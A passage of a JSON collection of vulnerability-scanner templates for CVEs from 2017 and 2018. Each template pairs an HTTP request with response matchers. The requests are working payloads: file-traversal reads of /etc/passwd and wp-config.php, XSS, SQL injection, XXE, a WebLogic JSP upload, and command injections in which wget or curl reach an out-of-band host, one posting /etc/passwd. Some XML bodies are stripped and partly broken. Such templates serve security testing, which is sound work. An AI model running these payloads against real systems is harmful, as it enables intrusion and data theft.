"status":[200]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"\n \n \n 0\n \n \n \n \n \n false\n 0\n \n \n \n \n \n wget\n --post-file\n /etc/passwd\n {{interactsh-url}}\n \n false\n \n \n \n \n java.lang.ProcessBuilder\n start\n \n \n asdasd\n \n asdasd\n \n \n \n \n false\n \n \n \n 0\n \n \n \n \n \n \n \n \n\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18502","info":{"name":"Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Subscriber by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["forbidden - number in author",""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18493","info":{"name":"Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Custom Admin Page by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["console.log(\"document.domain\")&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":[""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-10942","info":{"name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /modules/{{paths}}/file_upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n--ba1f796d0aa2482e9c51c81ae6087818\nContent-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\nContent-Type: multipart/form-data\n\n{{randstr}}\n--ba1f796d0aa2482e9c51c81ae6087818--\n","GET /modules/{{paths}}/file_uploads/{{file}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"paths":["attributewizardpro","1attributewizardpro","attributewizardpro.OLD","attributewizardpro_x"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{{filename}}"]},{"type":"word","part":"body_2","words":["{{randstr}}"]}],"extractors":[{"type":"regex","name":"file","part":"body_1","internal":true,"group":1,"regex":["(.*?)\\|\\|\\|\\|"]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n\n \n \n ALttP\n \n \n \n 12345\n \n \n \n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n\n ]>\n \n \n \n \n <Extension>&xxe;</Extension>\n \n \n \n \n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/>=&\"><< Back

    "]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":[""],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":[""],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n]>&disclose;\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["([0-9]+){{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\">"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '>')"],"condition":"and"}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File 